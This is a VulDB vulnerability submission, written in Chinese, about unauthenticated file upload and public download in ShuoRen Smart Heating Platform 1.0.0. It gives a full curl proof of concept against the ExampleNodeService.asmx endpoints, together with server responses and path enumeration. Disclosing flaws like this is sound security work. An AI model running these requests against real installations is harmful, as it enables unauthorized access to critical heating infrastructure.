| 标题 | 北京硕人时代科技股份有限公司 北京硕人时代智慧供热平台 1.0.0 未登录下文件上传以及下载 |
|---|
| 描述 | 未授权文件上传,可以不登录的情况下上传文件。
上传文件路径泄露与可公开下载,上传的文件可以通过枚举得到路径,并且再次下载到本地。
以下是完整复现
```bash
BASE="http://x.x.x.x:8001"
echo "poc" >/tmp/poc.txt
curl -i -X POST "$BASE/MP/Service/Webservice/ExampleNodeService.asmx/UpFileToExample" \
-F "sData=1" \
-F "file=@/tmp/poc.txt;type=text/plain"
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 Feb 2026 13:48:45 GMT
Content-Length: 18
文件上传成功
IMG=$(curl -s "$BASE/MP/Service/Webservice/ExampleNodeService.asmx/GetExampleNodeStr" \
| rg -o '\.\./Images/[^"]*poc\.txt' | tail -n1)
echo "$IMG"
curl -i "$BASE/MP/${IMG#../}"
../Images/A1A639064433254215017Apoc.txt
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 11 Feb 2026 13:48:45 GMT
Accept-Ranges: bytes
ETag: "e1f639245d9bdc1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 11 Feb 2026 13:54:48 GMT
Content-Length: 4
poc
``` |
|---|
| 来源 | ⚠️ http://x.x.x.x:8001 |
|---|
| 用户 | zsmaaa (UID 93294) |
|---|
| 提交 | 2026-02-11 15時14分 (4 月前) |
|---|
| 管理 | 2026-02-23 14時59分 (12 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 347381 [ShuoRen Smart Heating Integrated Management Platform 1.0.0 ExampleNodeService.asmx 文件 权限提升] |
|---|
| 积分 | 17 |
|---|